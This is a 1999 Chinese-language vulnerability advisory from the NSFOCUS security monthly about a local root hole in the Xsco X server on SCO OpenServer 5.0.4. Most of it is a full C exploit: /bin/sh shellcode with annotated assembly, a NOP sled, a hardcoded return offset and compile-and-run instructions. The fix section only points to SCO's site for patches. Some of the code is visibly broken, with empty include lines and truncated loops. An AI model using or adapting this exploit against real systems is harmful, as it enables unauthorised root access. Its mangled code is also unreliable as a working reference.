首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第2期->最新漏洞
期刊号: 类型: 关键词:
SCO OpenServer 5.0.4 'xSco' 漏洞

作者:The Dark Raver of CPNE
整理:小鱼儿(littlefish@soim.net)
日期:1999-10-15


概述:
    The 'Xsco' 是SCO Server的 XServer 支持的后台程序。这一工具被发现存在允许本地用户获取Root权限的漏洞。

漏洞描述:
    通过如下代码检测此漏洞:

/*
* Local root exploit
*
* Offset: Xsco (SCO OpenServer 5.0.4)
* 0 -> from gdb
* 50 - 100 -> from shell
*
* 编译:
* $ cc xserverx.c -o xserverx
* $ /usr/bin/X11/Xsco :`xserverx 80`
*
* 作者: The Dark Raver of CPNE (Murcia/Spain 1999-6-23)
*
*
*
*/


#include
#include

char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/


#define OFF 0x80478ff // SCO OpenServer 5.0.4
#define ALINEA 2
#define LEN 200


int main(int argc, char *argv[]) {

int offset=0;
char buf[LEN];
int i;

if(argc < 2) {
printf("Usage: xserverx \n");
exit(0); }
else {
offset=atoi(argv[1]); }

memset(buf,0x90,LEN);
memcpy(buf+80,hell,strlen(hell));
for(i=140+ALINEA;i *(int *)&buf[i]=OFF+offset;

for(i=0;i putchar(buf[i]);

exit(0);
}

解决方法:
http://www.sco.com站点去寻找最新的漏洞补丁。

版权所有,未经许可,不得转载